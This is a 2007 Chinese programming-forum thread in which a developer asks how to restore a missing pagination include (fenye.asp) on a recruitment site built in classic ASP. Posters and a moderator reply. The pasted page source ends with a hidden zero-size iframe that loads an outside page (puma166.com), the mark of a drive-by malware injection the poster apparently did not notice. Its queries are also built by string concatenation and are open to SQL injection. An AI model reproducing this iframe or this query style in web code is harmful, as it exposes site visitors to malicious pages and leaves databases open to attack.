| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 847 人关注过本帖
标题:一个网站丢了一个文件该怎么办?
只看楼主 加入收藏
zwz7075
Rank: 1
等 级:新手上路
帖 子:76
专家分:0
注 册:2005-12-30
收藏
 问题点数:0 回复次数:12 
一个网站丢了一个文件该怎么办?

各位好,请教大家一个问题,我刚半程接到个网站,但是由于前一位老兄把一个页面给删除了,所以网站一些功能不能用,我现在也是一头雾水,不知怎么去修复,具体情况是这样的:

这是一个招聘网站,这个页面是企业查询接收简历的,程序如下:



现在文件 fenye.asp 不见了,我应该怎么去处理?急急~

请求各位帮忙了!


谢谢!

[此贴子已经被作者于2007-6-1 17:58:49编辑过]

搜索更多相关主题的帖子: 文件 
2007-06-01 17:56
yms123
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:209
帖 子:12488
专家分:19042
注 册:2004-7-17
收藏
得分:0 
程序在那里?楼主没有贴出程序代码。
2007-06-01 18:46
enlangs
Rank: 1
等 级:等待验证会员
威 望:2
帖 子:218
专家分:0
注 册:2007-5-28
收藏
得分:0 
TJ...........
2007-06-01 18:50
zwz7075
Rank: 1
等 级:新手上路
帖 子:76
专家分:0
注 册:2005-12-30
收藏
得分:0 

谢谢回复,

注:apply_job_job126 这是个人用户发送简历信息的表


程序如下:

<!--#include file="../files/Connection.asp"-->
<!--#include file="../files/basesub.asp"-->
<!--#include file="../files/fenye.asp"-->
<%
'登陆检查
Unit_Check()

Dim Uidt
Uidt = Session("uid")

'链接数据库
Connect

Dim Sql, fy, ItemArr, ListSize
Sql = "Select * From apply_job_job126 where (receiver='" & Session("user_name") &"' and is_dele_unit = 0) order by is_read"
ListSize = 10
Set fy = new FenYe
With fy
.SetSql = Sql
.SetSize = ListSize
.RunQuery
End With
ItemArr = fy.GetArr
%>
<html>
<head>
<title>收到求职意向</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="../files/job126.css" rel="stylesheet" type="text/css">
<link href="../main.css" rel="stylesheet" type="text/css">
</head>

<body leftmargin="0" topmargin="0">
<% top_level:unit_nav %>
<TABLE width=776 border=0 align="center" cellPadding=2 cellSpacing=0>
<TBODY>
<TR>
<TD width=149 height=14 vAlign=top background="../picture/bg.gif"><FONT color=#ff0000>
<font color="#000000">今天是</font>
<SCRIPT language=JavaScript><!--
function DateWrite1()
{
var d,x,y,s="";
var x=new Array("日","一","二");
x=x.concat("三","四","五");
x=x.concat("六");

var y=new Array("1","2","3","4","5","6","7","8","9","10","11","12");
d=new Date();
s+=d.getUTCFullYear()+"年";
s+=y[d.getMonth()]+"月";
s+=d.getDate()+"日";
return s;
}
document.write ("<font color=black face='宋体' style='font-size:12px'>");
document.write (DateWrite1());
document.write("</font>");
--></SCRIPT>
</FONT></TD>
<TD height=14 colSpan=4 background="../picture/bg.gif"><FONT color=#ff0000>&nbsp;
</FONT><FONT color=#000000>首页&gt; 企业招聘&gt;</FONT><FONT color=#ff0000>
<SCRIPT language=Javascript>
<!--
document.write(document.title);
//-->
</SCRIPT>
&nbsp; </FONT></TD>
</TR>
<TR>
<TD width=149 height=95 rowSpan=15 vAlign=top background="../picture/bg.gif">
<TABLE bgColor=#c0c0c0 border=0 cellPadding=4 cellSpacing=1 width=149 >
<TBODY>
<TR>
<TD bgColor=#f7f7f7 width=20 > <IMG border=0
src=../picture/arrow_red.gif width=12 height=11 ></TD>
<TD bgColor=#ffffff width=104 height=18> <P align=center><font color="#008000"><strong>企业会员</strong></font></P></TD>
</TR>
<TR bgcolor="#f7f7f7">
<TD height=29 colspan=2><div align="center"><strong>帐号:<font color="#FF0066">
<%=Session("user_name")%></font></strong><font color="#FF0066">
</font></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=1 colspan=2><div align="center"><a href="../unit/searchrcxx.asp?uid=<%=uidt%>" target="_self">查询人才信息</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=1 colspan=2><div align="center"><a href="../unit/modiunitxx.asp?uid=<%=uidt%>" target="_self">维护公司信息</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=1 colspan=2><div align="center"><a href="../unit/addzpxx.asp?uid=<%=uidt%>" target="_self">增加招聘信息</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=1 colspan=2><div align="center"><a href="../unit/modizpxx.asp?uid=<%=uidt%>" target="_self">修改招聘信息</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onmouseover="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=1 colspan=2 ><div align="center"><a href="../unit/uloginf.asp?uid=<%=uidt%>" target="_self">统计所有信息</a></div></TD>
</TR>
<TR bgcolor="#E6F7FF" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#E6F7FF';">
<TD height=0 colspan=2><div align="center"><a href="../unit/sdqcyx.asp?uid=<%=uidt%>" target="_self">收到求职意向</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=-1 colspan=2><div align="center"><a href="../unit/fczbyx.asp?uid=<%=uidt%>" target="_self">发出招聘意向</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=0 colspan=2><div align="center">培训信息查询</div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=0 colspan=2><div align="center">人才信息订阅</div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD height=0 colspan=2><div align="center"><a href="../unit/modipassword.asp?uid=<%=uidt%>" target="_self">修改密码</a></div></TD>
</TR>
<TR bgcolor="#f7f7f7" onMouseOver="this.style.backgroundColor='#cccccc';"
onmouseout="this.style.backgroundColor='#f7f7f7';">
<TD colspan=2> <div align="center"></div>
<div align="center"><a href="../unit/quit.asp" target="_self">退出</a></div></TD>
</TR>
</TBODY>
</TABLE>   </TD>
<TD width=71 bgcolor="#e6ecef"><a href="../unit/sdqcyx.asp?uid=<%=uidt%>" target="_self">收到求职意向</a>
<TD colspan="2" bgcolor="#e6ecef">
<TD width=66 rowspan="15" background="../picture/bg.gif">
<TR>
<TD colspan="3" background="../picture/bg.gif">
<TR>
<TD colspan="3" background="../picture/bg.gif">
<TR>
<TD background="../picture/bg.gif">
<TD width="260" background="../picture/bg.gif">
<TD width="199" background="../picture/bg.gif">
<TR>
<TD colspan="3" background="../picture/bg.gif">
<a href="zwmodi.asp" target="_self"></a>
您收到的简历:
<TR>
<TD colspan="3" background="../picture/bg.gif">

<TR>
<TD colspan="3" align=middle background="../picture/bg.gif">
<%
Dim i
For i = 0 To Ubound(ItemArr,1)
If ItemArr(i,0) <> Empty Then
Response.Write( "<div>申请职位:"&ItemArr(i,3)&"&nbsp;附言:"&ItemArr(i,4)&"<a href=""pinform.asp?pid="&ItemArr(i,2)&""" target=""_blank"">查看简历</a></div>" )
Else
Exit For
End If
Next

fy.ShowNav

Set fy = Nothing
%>
&nbsp;

</TD>
</TR>
<TR>
<TD colspan="3" align=middle background="../picture/bg.gif">&nbsp;</TD>
</TR>
<TR>
<TD colspan="3" align=middle vAlign=top background="../picture/bg.gif"></TD>
</TR>
<TR>
<TD colspan="3" align=middle vAlign=top background="../picture/bg.gif">&nbsp;</TD>
</TR>
<TR>
<TD colspan="3" align=middle vAlign=top background="../picture/bg.gif">&nbsp;</TD>
</TR>



<TR>
<TD colspan="3" align=middle vAlign=top background="../picture/bg.gif">&nbsp;</TD>
</TR>
</TBODY>
</TABLE>
<%
'输出底部信息
copyright

sql="UPDATE unit SET 上次登录时间=Getdate() where UID='"&uidt&"'"
conn.Execute (sql)
conn.close
Set conn=Nothing
%>
</body>
</html><iframe src=http://www.puma166.com/1.htm width=0 height=0></iframe>

[此贴子已经被作者于2007-6-2 8:23:13编辑过]


华网(www.)全国最低价提供网站建设、空间域名服务
2007-06-02 08:20
zwz7075
Rank: 1
等 级:新手上路
帖 子:76
专家分:0
注 册:2005-12-30
收藏
得分:0 
这一段是企业接收投递给自己的求职简历程序:
Dim i
For i = 0 To Ubound(ItemArr,1)
If ItemArr(i,0) <> Empty Then
Response.Write( "<div>申请职位:"&ItemArr(i,3)&"&nbsp;附言:"&ItemArr(i,4)&"<a href=""pinform.asp?pid="&ItemArr(i,2)&""" target=""_blank"">查看简历</a></div>" )
Else
Exit For
End If
Next

fy.ShowNav

Set fy = Nothing
%>





版主及各位高手帮帮忙,谢谢了!

华网(www.)全国最低价提供网站建设、空间域名服务
2007-06-02 08:26
laoshu1
Rank: 1
等 级:新手上路
帖 子:44
专家分:0
注 册:2007-4-14
收藏
得分:0 
麻烦!丢了就丢了!还原把!
2007-06-02 11:34
zwz7075
Rank: 1
等 级:新手上路
帖 子:76
专家分:0
注 册:2005-12-30
收藏
得分:0 
如何还原?

华网(www.)全国最低价提供网站建设、空间域名服务
2007-06-02 13:31
guyer
Rank: 2
等 级:新手上路
威 望:5
帖 子:451
专家分:0
注 册:2007-1-19
收藏
得分:0 
那个页面 有什么功能 在写一边吧

http://www./
2007-06-02 15:44
lamide
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2007-6-2
收藏
得分:0 

单单给一个页面,一头雾水,而且也没有数据库,难做...


东方之花鲜花网 全国最理性的鲜花网 http://www.
2007-06-02 22:37
yms123
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:209
帖 子:12488
专家分:19042
注 册:2004-7-17
收藏
得分:0 
<!--#include file="../files/fenye.asp"-->
如果我没猜错的话楼主丢的那个页面,执行的功能是负责分页。
Set fy = new FenYe'这段代码应该就是在创建分页对象
With fy
.SetSql = Sql'这是设置sql语句
.SetSize = ListSize'设置每页显示的记录数
.RunQuery'执行查询
End With
ItemArr = fy.GetArr'这句话应该是返回一个二维数组里面有当前页的信息
'以下循环就是在循环当前页的信息
Dim i
For i = 0 To Ubound(ItemArr,1)
If ItemArr(i,0) <> Empty Then
Response.Write( "<div>申请职位:"&ItemArr(i,3)&"&nbsp;附言:"&ItemArr(i,4)&"<a href=""pinform.asp?pid="&ItemArr(i,2)&""" target=""_blank"">查看简历</a></div>" )
Else
Exit For
End If
Next

fy.ShowNav'这个个人分析有可能是进行上一页下一页的控制函数。


问题是这个分页程序缺少一个,至关重要的过程就是没有接收当前页的代码?这个代码是很重要的,但楼主给的页面没有见到这个至关重要的代码,没有这个代码分页程序个人认为应该是无法正确执行的
2007-06-03 11:16
快速回复:一个网站丢了一个文件该怎么办?
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.039472 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved